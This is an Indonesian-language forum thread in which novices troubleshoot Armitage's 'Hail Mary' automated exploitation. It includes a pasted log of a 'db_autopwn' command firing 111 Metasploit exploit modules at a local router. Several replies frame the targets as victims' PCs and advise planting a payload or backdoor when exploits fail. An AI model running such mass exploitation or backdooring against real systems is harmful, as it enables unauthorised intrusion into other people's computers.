ARMITAGE >HAILMARY ...IT'S SO Easy
#31
(08-15-2011, 06:10 PM)Alsad91 Wrote: bank ane nanya ni..
itu ip router yang di masukin ip router qt ato gmana ya bang???
terus fungsi dari hailmary itu apaan ya bang???
ane uda hampir berhasil nih bang,
thanxz za atas tutornya....

ip router gateway bang
(08-16-2011, 05:16 AM)Alsad91 Wrote: ane udah berhasil connect armitage bro..........
tapi lum behasil masuk kompi target caranya gmana ya??
kok punya ane gak da icon kompi yang ada petirnya???padahal ane ud cb masuk ke Host > Nmap > Quick scan ( Os detect ), tp tetep g muncul tuh kompi tartget
cara agar bisa muncul icon kompi yang ada petirnya gmana ya bro???
mohon pencerahanya ya gannnnnnnnnnnnnnnnnnnnnn...............
thxz bro... semangat ni bro..........

agak lama bro keluar kompi targetnya, setelah nmap lalu jalankan hailmary.

#32
(08-17-2011, 01:08 PM)gtx150 Wrote:
(08-15-2011, 06:10 PM)Alsad91 Wrote: bank ane nanya ni..
itu ip router yang di masukin ip router qt ato gmana ya bang???
terus fungsi dari hailmary itu apaan ya bang???
ane uda hampir berhasil nih bang,
thanxz za atas tutornya....

ip router gateway bang
(08-16-2011, 05:16 AM)Alsad91 Wrote: ane udah berhasil connect armitage bro..........
tapi lum behasil masuk kompi target caranya gmana ya??
kok punya ane gak da icon kompi yang ada petirnya???padahal ane ud cb masuk ke Host > Nmap > Quick scan ( Os detect ), tp tetep g muncul tuh kompi tartget
cara agar bisa muncul icon kompi yang ada petirnya gmana ya bro???
mohon pencerahanya ya gannnnnnnnnnnnnnnnnnnnnn...............
thxz bro... semangat ni bro..........

agak lama bro keluar kompi targetnya, setelah nmap lalu jalankan hailmary.

kok punya ane jugak bisa ya bro???, setelah ane Nmap .quick scan (Os detected) kok tetp gak keluar ya boss, padahal uda keluar show message : scan complate, fine Attack > blala..bla... , bla...
knapa ya bro ???

#33
(08-17-2011, 02:56 PM)mocyn36 Wrote:
(08-17-2011, 01:08 PM)gtx150 Wrote:
(08-15-2011, 06:10 PM)Alsad91 Wrote: bank ane nanya ni..
itu ip router yang di masukin ip router qt ato gmana ya bang???
terus fungsi dari hailmary itu apaan ya bang???
ane uda hampir berhasil nih bang,
thanxz za atas tutornya....

ip router gateway bang
(08-16-2011, 05:16 AM)Alsad91 Wrote: ane udah berhasil connect armitage bro..........
tapi lum behasil masuk kompi target caranya gmana ya??
kok punya ane gak da icon kompi yang ada petirnya???padahal ane ud cb masuk ke Host > Nmap > Quick scan ( Os detect ), tp tetep g muncul tuh kompi tartget
cara agar bisa muncul icon kompi yang ada petirnya gmana ya bro???
mohon pencerahanya ya gannnnnnnnnnnnnnnnnnnnnn...............
thxz bro... semangat ni bro..........

agak lama bro keluar kompi targetnya, setelah nmap lalu jalankan hailmary.

kok punya ane jugak bisa ya bro???, setelah ane Nmap .quick scan (Os detected) kok tetp gak keluar ya boss, padahal uda keluar show message : scan complate, fine Attack > blala..bla... , bla...
knapa ya bro ???

wah.. sama bro.......
ane juga gt e, setelah ane Nmap > quick scan (Os detected) terus keluar show message :

Scan Complete !
Use Attacks ->>Find Attacks to suggest
Applicable exploits for your targets. > OK

terus keluar kompi target , tp kok hitam semua ya bos, gak da yang tampilan OS nya.
terus
ane HAILMARY > by port kok keluarnya cm ginian ya bos??

db_autopwn -r -e -p -R great
[*] (1/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.1.1:80...
[*] (2/111 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.1.1:80...
[*] (3/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmp against 192.168.1.1:80...
[*] (4/111 [0 sessions]): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.1.1:80...
[*] (5/111 [0 sessions]): Launching exploit/windows/http/httpdx_handlepeer against 192.168.1.1:80...
[*] (6/111 [0 sessions]): Launching exploit/unix/webapp/mitel_awc_exec against 192.168.1.1:80...
[*] (7/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.1.1:21...
[*] (8/111 [0 sessions]): Launching exploit/windows/ftp/httpdx_tolog_format against 192.168.1.1:21...
[*] (9/111 [0 sessions]): Launching exploit/unix/webapp/phpbb_highlight against 192.168.1.1:80...
[*] (10/111 [0 sessions]): Launching exploit/windows/http/navicopa_get_overflow against 192.168.1.1:80...
[*] (11/111 [0 sessions]): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.1.1:80...
[*] (12/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.1.1:21...
[*] (13/111 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.1:80...
[*] (14/111 [0 sessions]): Launching exploit/windows/http/integard_password_bof against 192.168.1.1:80...
[*] (15/111 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.1:80...
[*] (16/111 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.1.1:80...
[*] (17/111 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.1:80...
[*] (18/111 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (19/111 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.1.1:21...
[*] (20/111 [0 sessions]): Launching exploit/windows/http/easyftp_list against 192.168.1.1:80...
[*] (21/111 [0 sessions]): Launching exploit/multi/http/axis2_deployer against 192.168.1.1:80...
[*] (22/111 [0 sessions]): Launching exploit/windows/proxy/bluecoat_winproxy_host against 192.168.1.1:80...
[*] (23/111 [0 sessions]): Launching exploit/windows/ftp/globalscapeftp_input against 192.168.1.1:21...
[*] (24/111 [0 sessions]): Launching exploit/unix/webapp/awstatstotals_multisort against 192.168.1.1:80...
[*] (25/111 [0 sessions]): Launching exploit/unix/webapp/oracle_vm_agent_utl against 192.168.1.1:80...
[*] (26/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_hostname against 192.168.1.1:80...
[*] (27/111 [0 sessions]): Launching exploit/unix/webapp/redmine_scm_exec against 192.168.1.1:80...
[*] (28/111 [0 sessions]): Launching exploit/unix/webapp/barracuda_img_exec against 192.168.1.1:80...
[*] (29/111 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.1.1:80...
[*] (30/111 [0 sessions]): Launching exploit/windows/http/hp_openview_insight_backdoor against 192.168.1.1:80...
[*] (31/111 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.1.1:80...
[*] (32/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebhelp against 192.168.1.1:80...
[*] (33/111 [0 sessions]): Launching exploit/unix/webapp/twiki_history against 192.168.1.1:80...
[*] (34/111 [0 sessions]): Launching exploit/multi/http/jboss_deploymentfilerepository against 192.168.1.1:80...
[*] (35/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_icount against 192.168.1.1:80...
[*] (36/111 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.1:80...
[*] (37/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmpviewer_actapp against 192.168.1.1:80...
[*] (38/111 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.1.1:80...
[*] (39/111 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.1.1:80...
[*] (40/111 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.1.1:80...
[*] (41/111 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.1:80...
[*] (42/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.1:80...
[*] (43/111 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.1:80...
[*] (44/111 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_unlock against 192.168.1.1:21...
[*] (45/111 [0 sessions]): Launching exploit/linux/http/linksys_apply_cgi against 192.168.1.1:80...
[*] (46/111 [0 sessions]): Launching exploit/unix/webapp/php_xmlrpc_eval against 192.168.1.1:80...
[*] (47/111 [0 sessions]): Launching exploit/windows/http/badblue_passthru against 192.168.1.1:80...
[*] (48/111 [0 sessions]): Launching exploit/multi/realserver/describe against 192.168.1.1:80...
[*] (49/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.1:80...
[*] (50/111 [0 sessions]): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.1.1:80...
[*] (51/111 [0 sessions]): Launching exploit/unix/webapp/mambo_cache_lite against 192.168.1.1:80...
[*] (52/111 [0 sessions]): Launching exploit/unix/webapp/nagios3_statuswml_ping against 192.168.1.1:80...
[*] (53/111 [0 sessions]): Launching exploit/windows/http/novell_imanager_upload against 192.168.1.1:80...
[*] (54/111 [0 sessions]): Launching exploit/windows/iis/ms01_026_dbldecode against 192.168.1.1:80...
[*] (55/111 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.1:80...
[*] (56/111 [0 sessions]): Launching exploit/windows/ftp/vermillion_ftpd_port against 192.168.1.1:21...
[*] (57/111 [0 sessions]): Launching exploit/windows/ftp/wsftp_server_503_mkd against 192.168.1.1:21...
[*] (58/111 [0 sessions]): Launching exploit/freebsd/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (59/111 [0 sessions]): Launching exploit/unix/http/contentkeeperweb_mimencode against 192.168.1.1:80...
[*] (60/111 [0 sessions]): Launching exploit/unix/webapp/php_include against 192.168.1.1:80...
[*] (61/111 [0 sessions]): Launching exploit/windows/http/apache_modjk_overflow against 192.168.1.1:80...
[*] (62/111 [0 sessions]): Launching exploit/windows/ftp/netterm_netftpd_user against 192.168.1.1:21...
[*] (63/111 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.1:80...
[*] (64/111 [0 sessions]): Launching exploit/multi/http/axis2_deployer_rest against 192.168.1.1:80...
[*] (65/111 [0 sessions]): Launching exploit/multi/wyse/hagent_untrusted_hsdata against 192.168.1.1:80...
[*] (66/111 [0 sessions]): Launching exploit/solaris/telnet/fuser against 192.168.1.1:23...
[*] (67/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_openview5 against 192.168.1.1:80...
[*] (68/111 [0 sessions]): Launching exploit/unix/webapp/oscommerce_filemanager against 192.168.1.1:80...
[*] (69/111 [0 sessions]): Launching exploit/unix/webapp/citrix_access_gateway_exec against 192.168.1.1:80...
[*] (70/111 [0 sessions]): Launching exploit/unix/webapp/sphpblog_file_upload against 192.168.1.1:80...
[*] (71/111 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.1.1:80...
[*] (72/111 [0 sessions]): Launching exploit/windows/ftp/ms09_053_ftpd_nlst against 192.168.1.1:21...
[*] (73/111 [0 sessions]): Launching exploit/unix/ftp/vsftpd_234_backdoor against 192.168.1.1:21...
[*] (74/111 [0 sessions]): Launching exploit/windows/ftp/slimftpd_list_concat against 192.168.1.1:21...
[*] (75/111 [0 sessions]): Launching exploit/multi/http/jboss_bshdeployer against 192.168.1.1:80...
[*] (76/111 [0 sessions]): Launching exploit/unix/webapp/joomla_tinybrowser against 192.168.1.1:80...
[*] (77/111 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.1.1:80...
[*] (78/111 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.1:80...
[*] (79/111 [0 sessions]): Launching exploit/multi/http/spree_searchlogic_exec against 192.168.1.1:80...
[*] (80/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_toolbar_01 against 192.168.1.1:80...
[*] (81/111 [0 sessions]): Launching exploit/unix/webapp/php_wordpress_lastpost against 192.168.1.1:80...
[*] (82/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_execvp against 192.168.1.1:80...
[*] (83/111 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.1:80...
[*] (84/111 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against 192.168.1.1:80...
[*] (85/111 [0 sessions]): Launching exploit/unix/webapp/base_qry_common against 192.168.1.1:80...
[*] (86/111 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.1:80...
[*] (87/111 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.1.1:80...
[*] (88/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro against 192.168.1.1:80...
[*] (89/111 [0 sessions]): Launching exploit/windows/http/edirectory_imonitor against 192.168.1.1:80...
[*] (90/111 [0 sessions]): Launching exploit/windows/http/badblue_ext_overflow against 192.168.1.1:80...
[*] (91/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.1:80...
[*] (92/111 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.1:80...
[*] (93/111 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.1:80...
[*] (94/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_list_fixret against 192.168.1.1:21...
[*] (95/111 [0 sessions]): Launching exploit/unix/webapp/twiki_search against 192.168.1.1:80...
[*] (96/111 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.1:80...
[*] (97/111 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against 192.168.1.1:80...
[*] (98/111 [0 sessions]): Launching exploit/unix/webapp/pajax_remote_exec against 192.168.1.1:80...
[*] (99/111 [0 sessions]): Launching exploit/windows/http/httpdx_tolog_format against 192.168.1.1:80...
[*] (100/111 [0 sessions]): Launching exploit/multi/ftp/wuftpd_site_exec_format against 192.168.1.1:21...
[*] (101/111 [0 sessions]): Launching exploit/multi/http/sun_jsws_dav_options against 192.168.1.1:80...
[*] (102/111 [0 sessions]): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.1.1:80...
[*] (103/111 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.1:80...
[*] (104/111 [0 sessions]): Launching exploit/solaris/telnet/ttyprompt against 192.168.1.1:23...
[*] (105/111 [0 sessions]): Launching exploit/windows/iis/ms03_007_ntdll_webdav against 192.168.1.1:80...
[*] (106/111 [0 sessions]): Launching exploit/windows/http/savant_31_overflow against 192.168.1.1:80...
[*] (107/111 [0 sessions]): Launching exploit/unix/ftp/proftpd_133c_backdoor against 192.168.1.1:21...
[*] (108/111 [0 sessions]): Launching exploit/unix/webapp/php_vbulletin_template against 192.168.1.1:80...
[*] (109/111 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_pass against 192.168.1.1:21...
[*] (110/111 [0 sessions]): Launching exploit/windows/http/intersystems_cache against 192.168.1.1:80...
[*] (111/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.1:80...
[*] (111/111 [0 sessions]): Waiting on 24 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 5 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 5 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 0 launched modules to finish execution...


kok gak muncul kompi target yang ada petirnya itu ya bro???
berkali2 ane coba terus gt ya bro???
mohon pencerahanya para brother IBT
trims

#34
klo diliat dari list diatas, kan itu hasil dari line metasploit:
Code:
db_autopwn -r -e -p -R great

yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban

tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang Smile

#35
(08-17-2011, 05:25 PM)konspirasi Wrote: klo diliat dari list diatas, kan itu hasil dari line metasploit:
Code:
db_autopwn -r -e -p -R great

yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban

tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang Smile

ow gt ya bro???, ane kurang ngerti masalah back door, mungkin brotau link di forum ini yag ngebahas metasploit with armitage yang gunain backdor buat masuk ke kompi target..,
thanxz ya bro.......

#36
mangastap tutor nie om ane makin konak make BT Big Grin

#37
apa ane salah masukin IP range nya ya bro??? waktu scan kan suruh masukin IP range tuh, terus ane cek ip router ane hasilnya ini 192.168.1.1
terus ane masukin tu ip router ane tu. ane tambahin /24 >..... 192.168.1.1/24

hasilnya terus kayak di atas,
tp klo emang tu butuhin backdoor,ut mohon yang tahu link tutorial buat back door di kompi target, mohon di shar disini
thaxz za bro..........

#38
(08-17-2011, 05:25 PM)konspirasi Wrote: klo diliat dari list diatas, kan itu hasil dari line metasploit:
Code:
db_autopwn -r -e -p -R great

yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban

tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang Smile

saya malah nmapnya gak bisa,apa karena airmon-ng wlan0 brlum saya stop,soalnya saya via lan bukan wifi,mohon pencerahannya
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#39
(08-17-2011, 10:33 PM)wine trochanter Wrote:
(08-17-2011, 05:25 PM)konspirasi Wrote: klo diliat dari list diatas, kan itu hasil dari line metasploit:
Code:
db_autopwn -r -e -p -R great

yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban

tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang Smile

saya malah nmapnya gak bisa,apa karena airmon-ng wlan0 brlum saya stop,soalnya saya via lan bukan wifi,mohon pencerahannya

anda koneknya pastikan pake eth0 ... matikan koneksi dengan wlan0

#40
(08-18-2011, 08:05 PM)cassaprodigy Wrote:
(08-17-2011, 10:33 PM)wine trochanter Wrote:
(08-17-2011, 05:25 PM)konspirasi Wrote: klo diliat dari list diatas, kan itu hasil dari line metasploit:
Code:
db_autopwn -r -e -p -R great

yg artinya dia akan mencoba exploit yang ada berdasarkan port yang terbuka pada pc calon korban

tapi, klo pc calon korban tadi udah di patch atau menggunakan firewall dan antivirus maka cara ini ga akan berhasil bro
harus bikin payload yg nantinya akan ditanam di pc korban atau backdoor klo temen2 bilang Smile

saya malah nmapnya gak bisa,apa karena airmon-ng wlan0 brlum saya stop,soalnya saya via lan bukan wifi,mohon pencerahannya

anda koneknya pastikan pake eth0 ... matikan koneksi dengan wlan0

maf ni bro....
qt pake eth0 atau wlan0 apa gak sama ja tuh bro???
kan itu semua tergantung driver apa yang qt pake kan???
maaf bro koreksi klo salah






Users browsing this thread: 2 Guest(s)